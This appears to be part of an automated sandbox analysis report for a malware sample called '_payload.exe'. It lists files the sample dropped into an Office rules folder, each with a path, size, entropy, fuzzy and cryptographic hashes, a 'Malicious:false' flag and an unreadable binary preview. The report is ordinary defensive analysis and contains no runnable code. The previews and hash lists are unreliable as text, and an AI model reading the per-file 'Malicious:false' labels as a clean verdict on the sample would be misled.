                                                                                                                                                                      MD5:C9FAF161EE00DE2E9C41A24DF77D0DB8
                                                                                                                                                                      SHA1:F99A8C8D8C1544F6806B741607448A590CD25BFC
                                                                                                                                                                      SHA-256:6BC5E3945FCAC70F8BF4FE10B47168F9CC35147F1B0D6BDA812B6DBABB9C585A
                                                                                                                                                                      SHA-512:B610CC16A79B2382ACAF7F97F755A7BADB7135EC3CDF9A4E539600F72B3F543AD50BD4E7560AF2F24894FE8F6E2CFEE0978E614BE2642C3EC1FF7843134C78D6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..e9A.2...b.a.nC;...@S.K.#.x..z..._......q..3.!..$.........GX*.....;.-...1...../..</.x."7;g...!a.z...........Ee....{:..p.{....K...#...L..'.1....~.!....&.......b. b.w]...j..H.....[...Wid..[..d..,....A..1....LG.G.......=~X..K..de$.6`.........:..0..V....j.......i.w.....:..a|..Vh..i...by..p'A..Y......M."'@.Y.6^Nr._.p....!R.n....V..}....C.D.$.1-.>...r.k..P..D$..D......D........D...z.,...?.7..+......P <U.Fa.%vHw.U..$.:.......{..T.E%o....A.C6PI+..P..K.._u/..a*.5<.......NQ...p.X.}..#..3]...w..._.uc..o.......E.;...Y..@.EN`.N...o..G......#KP#..ix6.y.h.,!...G.2..S1.C....1.........F..s....0iy.W......Ar.Ui.:..N.^2N#1..~."..O.U.......<.G..m`D..5...r.....(.D...T.d...bT...x....tk.>D&......?_.../x....8.CXjN.l.....@..3w..p.>..Z7..& .r..5..T...5...4o.......~...l...$..y...@.". ..q.:..If.>.}..-..zN.%%MW...@...T...{..)L..4..d.:....M.9....3/_..8..z.G|...G.5..B.<\.......+Kmrm k..Y.S..-]W...........+=.....)...^}4.l...>..q.....,.....S.....j..6i...46

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703100v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1689
                                                                                                                                                                      Entropy (8bit):7.867932211752848
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Rlf2bP0OX0P1fnLwcy2at8vw2YNzMvzxD:RkbbkP1fnL4CYxhML5
                                                                                                                                                                      MD5:439461CB866ACF334F4F262370BAE702
                                                                                                                                                                      SHA1:17209B2BC21A54F6240B3AA56AB94321EE4EF25F
                                                                                                                                                                      SHA-256:131C4AF91C6D9824CED7E8AE9214B04C09D2F3EA233D18850D91154466017DA9
                                                                                                                                                                      SHA-512:8B97D3191287F105B23D88D4D733C90A5608AD04863C2A840D821BF4404DB9AD6FDD896AF3E0502F03D745C229CBE5571EDEC463D4506DADC00C1CF471D03CE8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.^M...1.X.5........k.EkS|.\..>.....S....f...J.b......V...;;.......R...%)..n.E......f.D.Uh.....w.`Dq.....#.<.AN.HP)`....9.24B&.*..........N.E.="8.9..a.@=.-~O.V.zp0.gA.a1.......Yl.....f...(.......N.......yA0....h.......y...N......[....0]...'.|..t I(.W.SW...+..n.........~..o.`lm.._.......ob..^Z.f...0L:1.O.Z.<..H.L...0.P...9>..2.....]..........u........d.-l...f-.f....w_5..x.#_t..]...-o.......z........'W...l..V".....`.E........!F...x.XL.E....|-........\.5..........I._..k....#c..d...-.....oB.7t{7")..@.]....U.A..'5.eo6.k....l........6..N.t.......5.,....}......&S6.F..U2C..c..T.u.>.....$..4..F6V..."..!.....x.v....#.5z@...D.=..>..Sw.ze...KG`..A.My..:........d.m$....a.s..>e.q!...=9.D...Ke.c....tE...y...w7.|..=U-.w.4+..+.....>&.z.l...~....Um.?E.D..."i.#.....%S2..$..Q.'..Gv.C.JCw.+z.5.T#.....nRe.W...l..j..5....1w.......q.u.r..D.|.9~d..N.......7....B.cbm{;q.Iv..WN... m6...R..#.....7.j{..%j.'.\...h.$[@..Kf.2.h'.[.r..`.x8.V.e{..5........!Bu.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703101v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1726
                                                                                                                                                                      Entropy (8bit):7.885454611237959
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:xYsEJiauBbwClUlHBTyiwEUKFpA8Xst20rD:xYxtOGAMst2o
                                                                                                                                                                      MD5:61682EBAB929EBDE74F1FCC474413759
                                                                                                                                                                      SHA1:F6B1E4DA823E2ABEAA75FD01ACE04662A677EDDC
                                                                                                                                                                      SHA-256:8735022DA6BFE90A9A18F6EE90709743D08DBE0F8D174295A5B1C57C1E65DE83
                                                                                                                                                                      SHA-512:076569545D22FC5EA0C8828083967FD40FB171CF87E61D8D01D2D48998F2E00067BE5095FC3AB579829AF1A21FE27FA5068AB539052CD4BBC35AB3E33B571309
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.D.:...u....Z ..F.P.......T9....]X.:....8.I,.'.....|`..5`.......cA9..b_..U..5.%.b.r....8py....Vg.....u.%.K%9>Ev....i=....rB......?U6......)].-...g...;H^5s...0...<.5........kb...K.?..#.&.lO<..:X.bAQ.Y.kQx..1..(&.....R...C.M.r....R..~p."?.../....qZ3........}z..F.2;..Q.....d.Cl;..<.,../..79..%.rA.h...:....&.Gb...z...{....#..c.S.S...U{..6X,.dP."...R/%,.P./.).o....~.4..A9....X& .c^..>..H.3=..k....)^..M.]O-5...K..5U.Zy.......5..C.....]..X...(.u......8.u..y...:;..|~..|.)[ .4.......sd._...@A\.....u....!.|...,\.\<............/..o.&`..!..[.........3.3......W.....Q.J..T...E*q.....~."..f......vA.0......+...-~.]....y..-.$.^w..W.-$hTE.........W..d..'nM.[..B.7..#........p!.....pG. ...1.~.G.v...v9GQ....F.b.4..{.'....................,q.0..e...0...#/p...3$.}.yp...<.Z6.Y....#...h(w.....;....!...%NG..(V....+.i.>U../|Z-......_o.....-k.G#.#h.n....T.B.'...m%4.m....m.f..W.T.e/..,;.....za...b@...#u......\h..(.5...v}...b.....K...m.7..`..MS"...x.j.....s.}...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703150v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1707
                                                                                                                                                                      Entropy (8bit):7.890571703528793
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:OWHF/FSzc68w33tPFv0od/OE6qLxAAWWalMGvgD:OWR568Kp0eYmxAAgMGv8
                                                                                                                                                                      MD5:27C98DA6B66EF232DB07312B4B69727D
                                                                                                                                                                      SHA1:143AC5336A0E18F7F98660FE8AFE64950EA3AE38
                                                                                                                                                                      SHA-256:5AA642016BEA797046573C5A55451775E25ECEEC79AED032AE7F958325E31C65
                                                                                                                                                                      SHA-512:B3D1BAE2BD9985AB998601465B7B6B2D38A6C397CA8E97116D85420FC211F2C53AC18BD644C60C902400C52EE20A6ED830B600273737C27AF0F19C31BE3E0FFA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.........G...Y~.W.M........R&...y.|..zKr..........X...q].K.. ..~\...>.v.l..p..fK".5.h.4..B........d........CY...qK.0Y..)a..o.....[...M.....DQ..X......p..._~r]~.1cco7C.7....6..bC..m...'\..S...6..o..68QB.10.DnU...sB.s..c........m..7(.<.t.!@.{qP....3.tf.g..u.0..pc... J)..l/..C..m....Q...3...~..v.q=s_.E5`..Y.....>.r ]3:.r'.../..).I.4l.u.o#.[...xq}...{.........??....J?...E|.v...(B2..cD........!=.KaYc1#.A.P.'..V.8.Sp&D.+..]......BXWw......Z^...P.Pz?...J......v..I...O.3...n.$...0~..].ui...4....I..^.....<......t........V..X.e53..EX..-.`J.hG..1l.......Z...h.......... D.k.s........F6]..x...D...Bx.\.F.oo...l..wL.........iy...q_.9!....}.O.".Z.u...q..`..&....u'..bT..D....Y...{.d.&I..`8...3...0]\.............u.MG........\].z.......0...o...3.....El..m?.SF.(1H99...n....g\..f,`....r.....Y).2....N.O..%K].?l....b..X...06.O.......}t7..rE.q....V..;};..:..AsZ>.....j..]...'w..(..(.....Z....iL^.....O.a......W+p.-V~.%6...].....~..oK..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703151v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1744
                                                                                                                                                                      Entropy (8bit):7.882243601001192
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bds5J0vFd0Xwua4LFJIqGwbb14k5qWEAYMKcVZJjWA9NDapr2s7ZEXyISRk2bD:bdmICwu/JGw/n5xzHjHSatSBD
                                                                                                                                                                      MD5:B8D44F9327314B1AE648A22628DF50F1
                                                                                                                                                                      SHA1:91C6F018E06222ED8DCDA9438B7A28AF15D03947
                                                                                                                                                                      SHA-256:E72982C1468BD6553F6D47F9C9C1AB75D81139698ACC68C3DBA87AD418AA0653
                                                                                                                                                                      SHA-512:F8DF7266EB728BDB7B8C2801B89F797F12DE3CA1F9AC8581B84B92D641F585D62085AEA41DD33E27DA2F811AD24A8774A2460220634404A31EA2E4E60EED7158
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.E57..gg..gE.P.r....a...38..n..E.Jk.y9.}U.|...6..Q"P..*`.07..&.>..H..Y...U^..bQu=.M..0.V.(.na.d.~.&....qX...?>.]q...M......`.u.U"..8_..j.........>.w.<.].47`......:.^.#.na.PN-.u...!..?f'.yYH.Qv.q)...\.\..Lg..2.Z....Z...l'.S.+:OiO..y.C.9......Sd6.....,....^..;u..GJ.........V....~;g........sA4.R..+.....i......ap....[...E..Y.C......g.&Dh.@.`!3{....'.3.F.ofls..&m...2..A.V.....|...;....S......+...,.8.</.D.f..frS>.i|/_.C...:.l. .2........T....o%.h...U.F.I...0S.R$G...]..E ...F...H.g,ti..+.n_.3.#.'.;....Uerq.....b...N........k....."=.hG@."i.c...].s....|.FY.w......3U....,S.e..-.....1..m..ZI&..../6.[..w...C.iT..y..Gs.t....q...o%5...%...W.}.B/../".!.b.'....._.}...Z..@...-.?$..H.%.Hk]..}...Yj.. 1jqCR.p...F.B.N...;.<.k]>.NM.ng.T..Z[....Fb$...U.c.....d...Q..+Q.!q.EC.1k.J..D...........b.....sS.~..KK.JDg&.C..3........[)..RI......|.......F.i=/...D..^.. l.......\'..}..<,`0..........R.Y...g.nW../..i.7...l.QY....<..'...H.sz.[.....',.g..Z....<.=.`.4..G..DvS.?.(.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703200v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1695
                                                                                                                                                                      Entropy (8bit):7.885708287585251
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ZK6zB8XLUxCaS8I/Z0YpgqZbHq+++MKn4D:ZKIif/BvZbKwMKk
                                                                                                                                                                      MD5:73C7DF46CD2A005348CB56A0D6ACA112
                                                                                                                                                                      SHA1:3FC182020C865BB60DFE33D537B0DE405FF3CC22
                                                                                                                                                                      SHA-256:58F323C3F438FBB6D00A675CC07B75A5A1B936D8F11C4B512968E88D61CE31B4
                                                                                                                                                                      SHA-512:0512E8B34C597F7110136A00F4F7C4E6CEC4B4F8D9C0D5856B5341111A66163D61BEDB9F182415C4DDBEA09B090F721D5D3AF4496D864F16E94D7593AEBC1B7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlI...T..d.Y.......c...3...*...T~....R..j.v..J.....h......7.H0.||.^.k.{.....r.V.h.D..Qp.W....e.d...{.D.\*P........y.6..s...e.0}$..Q{#PmzT.%.l5..c....(...q...:...........l]!.'1...n.....1...X.9o..te.8.....t.....".:j..__+.gS.|..?.....-..}.kj@..,...%.r.(.......2U..`#.`.&K....X...].Jm..G..A(Q...=.........e.;{...p.o...,..j.E?.z..,......yr........s.?...e{..b.b.!...< .UV..OD..].Y.c...v~.by..5...u..;..WG..G.A.d|...d7...w.....N..+Y.G...i..@..{.S...4........5@HD.....B._.!.N...~...2.69...n0.L......0.......W.q....x....%u.....{Bs..7...XR..i.E..w^........Vmd.......q._.n.~.3..y...an.o4n."t....q.....6...bz$......_P.[?....R.S.).......6e..E..I...]..{{qk.>..3.....W.....B..&.C..R./..5G..N.9Yp. ..H.&c.=...eUd..{8....+.'..4|..E9.k...(.z/1...A....y&5O.:..j....g...I...a.....q..~.s......w&%...g...H0.N..*.....8...F. O....U../..9v...7.,..K....\...P#....A....jb..{.I3.....<h.8).#.......v..,w.<.N...i...0.Nq'A...-s..o4.A.u..Z6/....P........~.w.'yE.P:....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703201v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1732
                                                                                                                                                                      Entropy (8bit):7.872563202195944
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:cXDEI2khHVYriK+7NWBsPlrb14GQMj+HUSj1HmyhnD:cz3Hh1QiK+7NW2Plrb14Kj+HNHmyhD
                                                                                                                                                                      MD5:BECDA8F3E1D1C62E119D94C5BB2FF9B9
                                                                                                                                                                      SHA1:636A05CF23B2E80FB43DC0450F6F382789C48362
                                                                                                                                                                      SHA-256:A2E39D0A17D71FE9D88B86DF05C28307955291876D8763AA116F409E116A3CB9
                                                                                                                                                                      SHA-512:EC1F330E623807DACDC80A967923A8FF59B172675CFD6B4EA389F8E6E54282AE14F591F2E3255BD9B54FB1018E7A12AC01F1EBFB46FFE4147E8BB68DA852A4DD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlH.3T1m....e....;.E.AH.j.......-..As....(...h.....)U..u......g. ...Y.y..W:fKy..r.q.5Q........'......%..{.y..x+.g4e.\.v-..t8..;.....U8..\...k.*......=....2....R.3....$...c...,8.....L...... .J......5..U........HU.......A........#.^.M...D...|..q.wY.c....<...+..fj.X.j......`"..:...)....3v!........]%)......[.......%..W...f^o.Q0..d.fg4.b..+.;....QG3../.5d..>..K..m.bbD`..0.".[..M....B...4=.h(..8D..DC`...*..(.YK....m.\.bq...$4..p..w.....r...q..^..X.......Q...>....^..,....7K['....}..t\.a.....J.....e(..z.c.^........w..+.....1.k.P(........u...n._%-...U.]0....>..U..g0...,.W.BN...{...s".n.N]1-.m.75.....z.K..;.LqG_./...<.....%..<C.*.+......y........I..f.=.....QkN..X}s..:....Mm&.if...#A.).[I0c.....cY}e./T.......)N....%.\....}MW..Hkj.=*...I.I.=.W&.......8.U....F`.KN...~O.'f...+.x).......(G@.T..T.3._.JN......A...%,.......Fx.Ma.e...7V...]......F.@..&t.....,$Y.#.X....._..3...#V.......L.0.1..g.6".....m.]}.:....i[C;9.f.sB.fN..al..[P....>..z..j..,0+..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703250v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1693
                                                                                                                                                                      Entropy (8bit):7.892516374927518
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:6PjubC8dVcCWVDrxYka6h7FRJfPj3kpdRD:262oyrxYkhZj3kpdZ
                                                                                                                                                                      MD5:08E4CEFAA659675BF716C0F21AFB7757
                                                                                                                                                                      SHA1:1E7B81479941685892A1BA364EC4DB98A8C2A3D0
                                                                                                                                                                      SHA-256:EA79210E66324D1C5570B3F9B7A518267B7FA45AAC7353ADB6E8C3C975B23949
                                                                                                                                                                      SHA-512:4CDF362A986401B5CBDDF7A5B2680065DD0D7CE60E78DE29973F2D336F670768FA48CE7DD5A6B20B439A5599692C75D94375D265E3AA260A01A0035D74E02422
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..i.4..........t.8]..~.+...j.7...#.>....."Y.......B.U8/....@.o%.w.N.......L..1............f.&...A....|..'.$)..(R;...v......0[.O..I..oK.*1p...f.6..8.....<.o...$1...r#...gd..yQ....TI9...2b...a.u.!.......&...jI.XJ.r...<.a[...Q_\.N./.[."...a#.T..2.....U.M.x..Y... .."...U/o.f..h5.\=.......>M.cs'.]....6.75.:O.c.xk...sx.h.>.].........K.1'........MB.z...gx.D]#.k.D...j..<1.b...D...PR.T..o{(..g...q..".#...6.8......VUm...C..%.'".'"t.Nh.7...>._.....n+.L..$..I.....>Q.....&.j....M..j_....6@......!.f.[..?!..2....Q.....G..L_c.NQY..h ..;.%..CU.y..D4...@.8H.].0'c.8M...~.Mij..q.Z..=..^@....".<t."...{C.J.q.I@D.6....Q}....S..y...81....U.....7.e.i.(..........7...q..=x...M.k..N.L....8...H.I.|.u<.y.`....BS8.8W..q..ua..mW.i.;.z[.W;m..#.]8..a..Q.5.]..s..\...`...i.C..y.rNS......6..h..$8....{.WtB4.....L.:J.U>.KF.......n............."."...x^J.(.Z......)..cj..Y...&....[.{.7...-?H`.1.B..r...H.O.0. G..#Y.........C.\h../;.".K...f.....h..*..n.....!_.SJ._...t.x>.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703251v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1730
                                                                                                                                                                      Entropy (8bit):7.863252051461318
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:opUIYm//0kxz16DNB3pKlMwrd5vtvrb2muF1jbBWSL0ID:oOYnZ1UrSMmPtvv2murjbBbp
                                                                                                                                                                      MD5:9D5344B4891F377905777F371C48B86F
                                                                                                                                                                      SHA1:03479F81C590CFE6829CB3EB2CC330FB7A22F94F
                                                                                                                                                                      SHA-256:395726F1BA64D3445280CDA9E6A94FC4E2E3D1B2BDA0748DCAD926A875456E8C
                                                                                                                                                                      SHA-512:ED69B7158E36D8F80C8000DCE866C462AECAB3A562E44BEBB94BE5D7A7CFA3DB56E117A010285EFFFFC550345577E593AD252858012282A31B503E1862B3CCA8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..,m..4|.&.7.?u..J0.-..YUlh.y%...9.l./.KLvQ.....(.........{6..H..K...B..Oj..........8......j`.......nK...........k.^.H{..[1.o"..MJ..gL.......O7if..0..R.>......_..G....Q.KHS...<.......Ph.>!4.k8-.w..ZT.~..SP....W.%.c&........"0....^~.(+.?z....].1..7=............V..|...t..-.=.<....wA...n....=..Y...+.Z_.;x..QK..I).3.m.........d.v.P.......J......"...zm..:......-.kE.%.t.7....l....&....Y.Y.ig.\..$^..%..^%I......|u.7......6.VB...]e......N3S.0.|8.....{0K@.9YNP.:...oI....u.?..o"a...!a..;..YF|.............:...f.c.?....h&L...,..nPZ....x...{.>.C..x..fs.........n."gqfx...-....S.J6..b.RJr$.(.#X..H..rnJ.4E...esn>W..B...x.{..N$..y..2B..8Ys4..e.uK..9.n/N_mlx(.|.A..,mN.I.V&U.e...n......q.M..+...".....p...>..{1Z/..?.I..`.\.(.......x......$mS.W..;.^wl7.4...x.F..d.TLdi......A...............E.X''|....j..q...us..n.%.?,A.N.....$=.......O.q.X.6%_`?..<..p........~..W<..0..F..!A.WN....a...Y.$.S#..L..A..b...&CQ.b...'..qN>d....@...4..-..........m....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703300v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1715
                                                                                                                                                                      Entropy (8bit):7.873833889273228
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:s3ZngwVXkoGKC1hOd87w4/GL2gaNKvcrLeBAD:sJHVkHhhO6HGpaNIc5
                                                                                                                                                                      MD5:5D06E6C5A880F81C278F96AF22A28675
                                                                                                                                                                      SHA1:4E9F285775E15F429C680F11382D9A492E9BE815
                                                                                                                                                                      SHA-256:EF2AEF8BC09D25CEC25035C0D41F0DFA632F47CB23587B04BA9206AACFB2C038
                                                                                                                                                                      SHA-512:DE9A0274327E65B217CE487CD3A223B7A510AF5F61801F8A5FCA755321B3DAAE6173C68338A5578C5EA9DFDDD26C10734EB6B7C81FD3F4E14C4D9B4165CA90A4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlCg....?K/Lu6?....W.....,.)n2...a....Y.<w.<..|.4.HG.9gw..>dZ..{..1.Gk.q{...\=.V...3.>.P..x.+...Qh.7..f.i..,s....D....;.'.#..JKy.\s......3..T}b.K..*.....=...._3.+./.. ...u.G.1=yQg.0.-......T.&.|.i....A..Y.$....$M]....z.'.}p...D.z.$...m..hN...]%......|..1.$i..>..)../.|O|.Ya..gRHN.b.(.L.?.4.a...78..#.(e}e.<.....X.{.gD..|z....1 ....0k.C...].....aL..S.`}...`.x........-4 0]..3.*.8...M.vQJ-...\R2.<......"..}...h=nY.uuj...bq......1......:..@.....#.p..2L.N.-l.....W.k9iiV...J.|......W.U1ebfU$..|Uq~......J.\.dE....jZZI.]A....,>G@...l....ou}l.-lH..~h.........u. ..d.a<.=.g.....P..].-.9?.. c...0;.z.>.$.Ra....2...AX^..!.....qO.y...I{..5..X:..\..../..F.K.z4.C.0..!..."..,.:.d.$...|.nSj.......LA.K....3.?.M..=......P=..F.E..SA|...K..~..:.t<[P`.c..J.k..(^.Q....X64...%..N.GBO..>kb.....V.!..d.M..8Gd..l..;.3h.. ....6....J.Y..I..`.... e./W.,M...z.>...K...$ ....QL....:.I..>..;wx..sk,..!..r=;...11.{....j.pN.xw.m..B.r........*.......\S......=...&.t7.q...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703301v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1752
                                                                                                                                                                      Entropy (8bit):7.909643524748991
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ys1ygv0h38WLRLa6n7wtR9fhCoN1SWWWmduh6HrbD:t1liswNa6stfhC2GZuUHr
                                                                                                                                                                      MD5:0DD3096C2DDBA2086056FD15BCEDD982
                                                                                                                                                                      SHA1:2EB0A56C30110D42C7BC983AEF87513F01D76BAF
                                                                                                                                                                      SHA-256:081D05C986B11EFFD463E10A83DF2880B6C04B413D8BCBB7D5DC7273046ABC3A
                                                                                                                                                                      SHA-512:DE8B5A859164A1EFB45BF9B88A37780054FC6B0F9FDC96FAF91062C5258D8BFC831EDE197D68D54B44A5E7BD3DA60FD4CA38C789C308A2676FB0B86CF958558E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.2.=.>'....^8.MC..T\k.CG.l...<].;...D....61 {..D.y.3e$..|...u;....>..Q.....l.}S...d....7./.2u..O../.......]....g..S..},=.;.....=.7x..$.....`..5c..HF=.2:F......l..E^...n....0m.Oa.....<.gs;J.....)..z...x#...........4..F*.x>6"...u..|.n.#...nl.........[K{Kd..B...........6.4.8[..(.>_^..q..:......s.G.....`.,.3Sw.....W$K="......2......Ao......B+Gi..O.u..z...b=!..Pl.c.gJ.5.lMH.,..N..&..e....iMn.].!XQ.V,..W..Z..\udj....&J.1L.w..8<c1....,.t...1..5...8..^...FQt...j$.pW<g2<h....8..6..0...@...yh?./...G........N2pT......^>>...1..b..K....v...HE..qoa..y......y.@........_.........5q.....P.~W.......#.........CgK........~...R..!..k./.]X#.?....h.zz.+<.O.q.i...{...=....*.IQ.......H.eH3o....%...].aw.G.`...N...Mi..U......X...0u..a...5H..f<P.|.....3C..]..H6h.C.8..?....n(..QT:HA...+..m!....z.V.);.(L~..'.....RJ:..<..K..M.v.e'.W.R.......j.....$...>.....{.?.`.+{.h..7"(.nyFMv...G..9Z%.....'.Lf..........i.IH....+7......w..w.....Jne\...".a{H{.X.W...c..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703350v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1699
                                                                                                                                                                      Entropy (8bit):7.865041464549391
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:KJXO4tRlCAfaILM9ChR3dSwO50gErVhIDsD:YXO4jcASILMw33dSKgihI0
                                                                                                                                                                      MD5:B845F2FB1EDF515FF4F23774D5A8DCBD
                                                                                                                                                                      SHA1:8F957DDCF7EBBB3C8632C2033BDB7CE9D0B22ADF
                                                                                                                                                                      SHA-256:9942772A4D33C1CF9943FF06BEFE0E88DDFDC110B3B6C71FD266CB356DE653EE
                                                                                                                                                                      SHA-512:7302614C2AF769BED2737052B7D27DA88AF593166DDAF2D389523A814754C5F4147F901413253BCDFBF8F2A49F5BEE2E76A0BFD5ED041895249D568DF8BFD983
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.o..d...$QM'..'.nK..j....K.....~........d.KP.$.....c.f.)_..-.p7h..hZn...N.P..#..?....t..w.B......n...J...6..Tk.....4+.J..JB.....;.)p..h.......l.....1=.a.<.k.,.9SEm....`a.pO&=[.8S9.........KF..J.%..y....2....?.......rmuw.@..sH....... ....e..(ER.*C(..#..H.....X._?.8...$X T...k;......}.....p.QY...B..0.uo..H...!. .(..|.....{.>X.+k!..E...@....R.....4.G.M.._.3,(<.4.b.Ah....Mq...?\.2...!Y.;..~..+...))..,.. ..z../........;.a..E.qy.* H.....` _&...BW.9E.m._.v.....Dg^.r&..j.,.Nw....E.t.......t..Yq..d#..rk.#J..ma....O.dE..f...s..ok...o..`..`.zR}..W....,.L...dl.rlk.X..Qm....){D.;.k,.?.oh....K...&..)...jq....^O..kjg....o.Y..d...3.j;.+5..#.....l.".E.0gW.......%N6l*.6....A6...n...nF+O..J:...sa}..Y......?/.{.b/%......2.TPm....~.......z.(./.i.i-.......[......d....GL..Z..+).......D....~..AO.#Z...WN^.....dwl...p2...Z6-Ay.%..j.6...u.%..?k...M..f.s.4...M.Se.....z.....4....iJ`9...#...J../N.g......&.Er....OF..W.I.+E..gMh.H.X..,....g0......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703351v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1736
                                                                                                                                                                      Entropy (8bit):7.891979010325719
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Q0rVDm4WKyiIK9+E4BKh1C0esx9b63O6PYvBsVD:Q0pXWKdIK9t4BKhYbEbuv/
                                                                                                                                                                      MD5:6E779B2F7FDEE2A60CA430EAEF2258FD
                                                                                                                                                                      SHA1:D59263D2085FE7D455CBCF3D3C70537EA2C5CD26
                                                                                                                                                                      SHA-256:3EE5A67BC5F4700C6D637345D3A866E3A2778258CEE53A8526A7FA01D67D9532
                                                                                                                                                                      SHA-512:0B530AECB2CF8EE1DD887BFD756328883D063D082146C506EF2E8A05DAC1F0D7C374C229EA529C80DAEBB19CA957BD7D0973740CBE41D098CE386E08F6A28747
                                                                                                                                                                      Malicious:false
